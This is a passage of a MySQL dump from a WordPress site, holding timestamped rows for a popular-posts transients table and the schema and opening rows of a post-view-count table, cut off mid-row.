21:28:20'),(55431,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 21:42:03'),(55432,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 22:05:58'),(55433,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 22:09:23'),(55434,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 22:13:42'),(55435,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 22:21:28'),(55436,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 22:23:59'),(55437,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 22:29:53'),(55438,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 23:00:19'),(55439,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 23:04:28'),(55440,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 23:06:22'),(55441,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 23:07:25'),(55442,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-20 23:24:02'),(55443,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 00:03:58'),(55444,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 00:06:03'),(55445,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 00:09:51'),(55446,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 00:34:46'),(55447,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 00:57:54'),(55448,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:07:05'),(55449,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:09:56'),(55450,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:16:20'),(55451,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:19:33'),(55452,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:35:09'),(55453,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:38:59'),(55454,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 01:47:39'),(55455,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:01:33'),(55456,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:02:57'),(55457,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:07:49'),(55458,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:18:13'),(55459,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:19:33'),(55460,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:24:29'),(55461,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:30:15'),(55462,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 02:50:13'),(55463,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 03:15:22'),(55464,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 03:38:01'),(55465,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 03:40:05'),(55466,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 03:44:33'),(55467,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 03:56:05'),(55468,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 03:57:54'),(55469,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:02:58'),(55470,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:06:57'),(55471,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:13:49'),(55472,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:17:42'),(55473,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:46:21'),(55474,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:53:37'),(55475,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 04:56:49'),(55476,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:02:13'),(55477,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:07:28'),(55478,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:14:00'),(55479,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:23:55'),(55480,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:27:56'),(55481,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:39:32'),(55482,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:42:31'),(55483,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:43:32'),(55484,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:44:34'),(55485,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:45:36'),(55486,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:46:38'),(55487,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:47:40'),(55488,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:48:42'),(55489,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:49:44'),(55490,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:50:45'),(55491,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:51:46'),(55492,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:52:47'),(55493,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 05:57:57'),(55494,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 06:07:34'),(55495,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 06:31:00'),(55496,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 06:57:28'),(55497,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 07:10:42'),(55498,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 07:20:38'),(55499,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 07:25:55'),(55500,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 07:33:56'),(55501,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:06:05'),(55502,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:10:11'),(55503,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:16:11'),(55504,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:22:50'),(55505,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:34:43'),(55506,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:36:08'),(55507,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:42:59'),(55508,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:53:53'),(55509,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 08:56:16'),(55510,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:02:17'),(55511,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:20:18'),(55512,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:25:06'),(55513,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:26:37'),(55514,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:28:31'),(55515,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:40:16'),(55516,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 09:57:40'),(55517,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 10:05:15'),(55518,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 10:09:20'),(55519,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 10:29:32'),(55520,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 10:51:07'),(55521,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 11:04:16'),(55522,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 11:32:09'),(55523,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 11:34:17'),(55524,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 11:39:00'),(55525,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 11:51:08'),(55526,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 12:20:48'),(55527,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 12:32:12'),(55528,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 12:39:27'),(55529,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 12:40:45'),(55530,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 12:42:05'),(55531,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 12:55:46'),(55532,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 13:12:26'),(55533,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 13:35:48'),(55534,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 13:37:31'),(55535,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 13:46:07'),(55536,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:01:49'),(55537,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:02:54'),(55538,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:11:52'),(55539,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:13:16'),(55540,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:18:22'),(55541,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:23:41'),(55542,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:27:03'),(55543,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:37:28'),(55544,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:41:19'),(55545,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 14:52:41'),(55546,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 15:02:59'),(55547,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 15:05:00'),(55548,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 15:50:43'),(55549,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:03:36'),(55550,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:16:03'),(55551,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:22:03'),(55552,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:29:50'),(55553,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:31:41'),(55554,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:32:43'),(55555,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 16:36:00'),(55556,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:00:46'),(55557,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:03:45'),(55558,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:06:11'),(55559,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:23:11'),(55560,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:39:04'),(55561,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:40:08'),(55562,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 17:41:19'),(55563,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:03:37'),(55564,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:05:18'),(55565,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:18:11'),(55566,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:28:03'),(55567,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:32:10'),(55568,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:41:14'),(55569,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 18:52:07'),(55570,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 19:01:11'),(55571,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 19:10:06'),(55572,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 19:17:33'),(55573,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 19:34:26'),(55574,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 19:40:35'),(55575,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 19:42:03'),(55576,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:01:07'),(55577,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:07:42'),(55578,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:15:15'),(55579,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:17:35'),(55580,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:19:10'),(55581,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:25:26'),(55582,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:33:02'),(55583,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 20:41:22'),(55584,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 21:00:51'),(55585,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 21:21:38'),(55586,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 21:49:54'),(55587,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 21:50:57'),(55588,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 22:16:35'),(55589,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 22:54:55'),(55590,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 22:58:15'),(55591,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:00:04'),(55592,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:14:15'),(55593,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:20:15'),(55594,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:26:26'),(55595,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:28:54'),(55596,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:39:32'),(55597,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:48:22'),(55598,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-21 23:49:26'),(55599,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:04:22'),(55600,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:12:32'),(55601,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:16:55'),(55602,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:19:43'),(55603,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:22:19'),(55604,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:23:28'),(55605,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 00:58:30'),(55606,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 01:05:36'),(55607,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 01:36:37'),(55608,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 01:44:47'),(55609,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 01:47:55'),(55610,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 01:50:35'),(55611,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 01:57:24'),(55612,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 02:07:41'),(55613,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 02:17:16'),(55614,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 02:30:47'),(55615,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 02:32:11'),(55616,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:00:35'),(55617,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:04:46'),(55618,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:06:08'),(55619,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:16:22'),(55620,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:27:07'),(55621,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:32:55'),(55622,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:40:09'),(55623,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:41:16'),(55624,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 03:49:25'),(55625,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 04:18:48'),(55626,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 04:36:40'),(55627,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 04:42:19'),(55628,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 04:44:59'),(55629,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 04:48:56'),(55630,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 04:57:24'),(55631,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:03:02'),(55632,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:04:04'),(55633,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:17:17'),(55634,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:21:03'),(55635,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:22:04'),(55636,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:28:08'),(55637,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:29:34'),(55638,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:32:34'),(55639,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:36:13'),(55640,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:38:08'),(55641,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:42:09'),(55642,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:43:21'),(55643,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 05:57:18'),(55644,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:03:52'),(55645,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:10:12'),(55646,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:15:01'),(55647,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:17:28'),(55648,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:20:59'),(55649,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:22:13'),(55650,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:35:01'),(55651,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2026-06-22 06:40:03');
/*!40000 ALTER TABLE `wp_popularpoststransients` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_post_views`
--

DROP TABLE IF EXISTS `wp_post_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_post_views` (
  `id` bigint(20) unsigned NOT NULL,
  `type` tinyint(1) unsigned NOT NULL,
  `period` varchar(8) COLLATE utf8mb4_unicode_ci NOT NULL,
  `count` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`type`,`period`,`id`),
  UNIQUE KEY `id_type_period_count` (`id`,`type`,`period`,`count`) USING BTREE,
  KEY `type_period_count` (`type`,`period`,`count`) USING BTREE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_post_views`
--

LOCK TABLES `wp_post_views` WRITE;
/*!40000 ALTER TABLE `wp_post_views` DISABLE KEYS */;
INSERT INTO `wp_post_views` VALUES (74,0,'20260523',1),(102,0,'20260523',1),(467,0,'20260523',1),(469,0,'20260523',1),(472,0,'20260523',1),(477,0,'20260523',1),(478,0,'20260523',1),(481,0,'20260523',1),(482,0,'20260523',1),(484,0,'20260523',1),(486,0,'20260523',1),(487,0,'20260523',1),(570,0,'20260523',1),(1588,0,'20260523',1),(1596,0,'20260523',1),(1602,0,'20260523',1),(1606,0,'20260523',1),(1724,0,'20260523',1),(1743,0,'20260523',1),(1766,0,'20260523',1),(2148,0,'20260523',1),(2152,0,'20260523',1),(2457,0,'20260523',1),(2775,0,'20260523',1),(2804,0,'20260523',1),(2809,0,'20260523',1),(3023,0,'20260523',1),(3096,0,'20260523',1),(3107,0,'20260523',1),(3127,0,'20260523',1),(3229,0,'20260523',1),(3245,0,'20260523',1),(3249,0,'20260523',1),(3259,0,'20260523',1),(3265,0,'20260523',1),(3267,0,'20260523',1),(3278,0,'20260523',1),(3307,0,'20260523',1),(3479,0,'20260523',1),(3482,0,'20260523',1),(3727,0,'20260523',1),(3731,0,'20260523',1),(3738,0,'20260523',1),(3764,0,'20260523',1),(3771,0,'20260523',1),(4238,0,'20260523',1),(4326,0,'20260523',1),(4329,0,'20260523',1),(4357,0,'20260523',1),(4400,0,'20260523',1),(4408,0,'20260523',1),(4420,0,'20260523',1),(4454,0,'20260523',1),(4520,0,'20260523',1),(4546,0,'20260523',1),(4608,0,'20260523',1),(4612,0,'20260523',1),(4677,0,'20260523',1),(4700,0,'20260523',1),(4706,0,'20260523',1),(4709,0,'20260523',1),(4722,0,'20260523',1),(4797,0,'20260523',1),(4874,0,'20260523',1),(4893,0,'20260523',1),(4976,0,'20260523',1),(5046,0,'20260523',1),(5071,0,'20260523',1),(5101,0,'20260523',1),(5125,0,'20260523',1),(5131,0,'20260523',1),(5157,0,'20260523',1),(5248,0,'20260523',1),(5259,0,'20260523',1),(5264,0,'20260523',1),(5301,0,'20260523',1),(5310,0,'20260523',1),(5314,0,'20260523',1),(5317,0,'20260523',1),(5323,0,'20260523',1),(5326,0,'20260523',1),(5334,0,'20260523',1),(5363,0,'20260523',1),(5428,0,'20260523',1),(5433,0,'20260523',1),(5441,0,'20260523',1),(5464,0,'20260523',1),(5512,0,'20260523',1),(5515,0,'20260523',1),(5585,0,'20260523',1),(5609,0,'20260523',1),(5626,0,'20260523',1),(5636,0,'20260523',1),(5666,0,'20260523',1),(5683,0,'20260523',1),(5696,0,'20260523',1),(5700,0,'20260523',1),(5738,0,'20260523',1),(5828,0,'20260523',1),(5881,0,'20260523',1),(5889,0,'20260523',1),(87,0,'20260523',2),(108,0,'20260523',2),(471,0,'20260523',2),(476,0,'20260523',2),(480,0,'20260523',2),(483,0,'20260523',2),(485,0,'20260523',2),(1582,0,'20260523',2),(1610,0,'20260523',2),(1718,0,'20260523',2),(2154,0,'20260523',2),(2159,0,'20260523',2),(2248,0,'20260523',2),(2558,0,'20260523',2),(2911,0,'20260523',2),(3060,0,'20260523',2),(3297,0,'20260523',2),(3316,0,'20260523',2),(3430,0,'20260523',2),(3486,0,'20260523',2),(3489,0,'20260523',2),(3498,0,'20260523',2),(4301,0,'20260523',2),(4335,0,'20260523',2),(4363,0,'20260523',2),(4556,0,'20260523',2),(4587,0,'20260523',2),(4651,0,'20260523',2),(4654,0,'20260523',2),(4759,0,'20260523',2),(4765,0,'20260523',2),(4930,0,'20260523',2),(4996,0,'20260523',2),(5058,0,'20260523',2),(5122,0,'20260523',2),(5134,0,'20260523',2),(5153,0,'20260523',2),(5292,0,'20260523',2),(5304,0,'20260523',2),(5307,0,'20260523',2),(5353,0,'20260523',2),(5378,0,'20260523',2),(5397,0,'20260523',2),(5400,0,'20260523',2),(5406,0,'20260523',2),(5420,0,'20260523',2),(5457,0,'20260523',2),(5489,0,'20260523',2),(5492,0,'20260523',2),(5502,0,'20260523',2),(5735,0,'20260523',2),(5771,0,'20260523',2),(5785,0,'20260523',2),(5816,0,'20260523',2),(5821,0,'20260523',2),(5824,0,'20260523',2),(5844,0,'20260523',2),(5865,0,'20260523',2),(110,0,'20260523',3),(470,0,'20260523',3),(479,0,'20260523',3),(488,0,'20260523',3),(1594,0,'20260523',3),(1614,0,'20260523',3),(1747,0,'20260523',3),(2904,0,'20260523',3),(2993,0,'20260523',3),(3030,0,'20260523',3),(3781,0,'20260523',3),(4524,0,'20260523',3),(5137,0,'20260523',3),(5146,0,'20260523',3),(5561,0,'20260523',3),(5868,0,'20260523',3),(5878,0,'20260523',3),(1608,0,'20260523',4),(2503,0,'20260523',4),(4771,0,'20260523',4),(5593,0,'20260523',4),(5769,0,'20260523',4),(5833,0,'20260523',4),(84,0,'20260523',5),(91,0,'20260523',5),(5076,0,'20260523',5),(5847,0,'20260523',5),(5859,0,'20260523',5),(335,0,'20260523',6),(76,0,'20260523',7),(5872,0,'20260523',7),(89,0,'20260523',9),(5884,0,'20260523',9),(72,0,'20260523',14),(80,0,'20260523',20),(68,0,'20260523',22),(9,0,'20260523',642),(469,0,'20260524',1),(477,0,'20260524',1),(478,0,'20260524',1),(479,0,'20260524',1),(480,0,'20260524',1),(482,0,'20260524',1),(483,0,'20260524',1),(484,0,'20260524',1),(486,0,'20260524',1),(1544,0,'20260524',1),(1588,0,'20260524',1),(1592,0,'20260524',1),(1594,0,'20260524',1),(1596,0,'20260524',1),(1598,0,'20260524',1),(1600,0,'20260524',1),(1604,0,'20260524',1),(1606,0,'20260524',1),(1610,0,'20260524',1),(1614,0,'20260524',1),(1697,0,'20260524',1),(1699,0,'20260524',1),(1701,0,'20260524',1),(1703,0,'20260524',1),(1707,0,'20260524',1),(1711,0,'20260524',1),(1718,0,'20260524',1),(1720,0,'20260524',1),(1726,0,'20260524',1),(1728,0,'20260524',1),(1730,0,'20260524',1),(1732,0,'20260524',1),(1734,0,'20260524',1),(1737,0,'20260524',1),(1739,0,'20260524',1),(1741,0,'20260524',1),(1745,0,'20260524',1),(1749,0,'20260524',1),(1751,0,'20260524',1),(1766,0,'20260524',1),(1770,0,'20260524',1),(1772,0,'20260524',1),(1774,0,'20260524',1),(1776,0,'20260524',1),(1780,0,'20260524',1),(1782,0,'20260524',1),(2063,0,'20260524',1),(2148,0,'20260524',1),(2150,0,'20260524',1),(2152,0,'20260524',1),(2154,0,'20260524',1),(2156,0,'20260524',1),(2165,0,'20260524',1),(2178,0,'20260524',1),(2252,0,'20260524',1),(2296,0,'20260524',1),(2297,0,'20260524',1),(2309,0,'20260524',1),(2609,0,'20260524',1),(2658,0,'20260524',1),(2751,0,'20260524',1),(2801,0,'20260524',1),(2804,0,'20260524',1),(2813,0,'20260524',1),(2956,0,'20260524',1),(2989,0,'20260524',1),(2991,0,'20260524',1),(2993,0,'20260524',1),(3005,0,'20260524',1),(3023,0,'20260524',1),(3027,0,'20260524',1),(3034,0,'20260524',1),(3038,0,'20260524',1),(3045,0,'20260524',1),(3066,0,'20260524',1),(3069,0,'20260524',1),(3079,0,'20260524',1),(3090,0,'20260524',1),(3102,0,'20260524',1),(3104,0,'20260524',1),(3107,0,'20260524',1),(3109,0,'20260524',1),(3117,0,'20260524',1),(3127,0,'20260524',1),(3229,0,'20260524',1),(3240,0,'20260524',1),(3243,0,'20260524',1),(3245,0,'20260524',1),(3247,0,'20260524',1),(3253,0,'20260524',1),(3259,0,'20260524',1),(3269,0,'20260524',1),(3271,0,'20260524',1),(3278,0,'20260524',1),(3307,0,'20260524',1),(3313,0,'20260524',1),(3479,0,'20260524',1),(3482,0,'20260524',1),(3498,0,'20260524',1),(3534,0,'20260524',1),(3541,0,'20260524',1),(3714,0,'20260524',1),(3731,0,'20260524',1),(3742,0,'20260524',1),(3746,0,'20260524',1),(3774,0,'20260524',1),(3777,0,'20260524',1),(3781,0,'20260524',1),(4301,0,'20260524',1),(4323,0,'20260524',1),(4332,0,'20260524',1),(4363,0,'20260524',1),(4368,0,'20260524',1),(4373,0,'20260524',1),(4382,0,'20260524',1),(4391,0,'20260524',1),(4400,0,'20260524',1),(4408,0,'20260524',1),(4412,0,'20260524',1),(4416,0,'20260524',1),(4424,0,'20260524',1),(4428,0,'20260524',1),(4432,0,'20260524',1),(4436,0,'20260524',1),(4444,0,'20260524',1),(4448,0,'20260524',1),(4454,0,'20260524',1),(4514,0,'20260524',1),(4524,0,'20260524',1),(4542,0,'20260524',1),(4546,0,'20260524',1),(4551,0,'20260524',1),(4556,0,'20260524',1),(4608,0,'20260524',1),(4651,0,'20260524',1),(4663,0,'20260524',1),(4694,0,'20260524',1),(4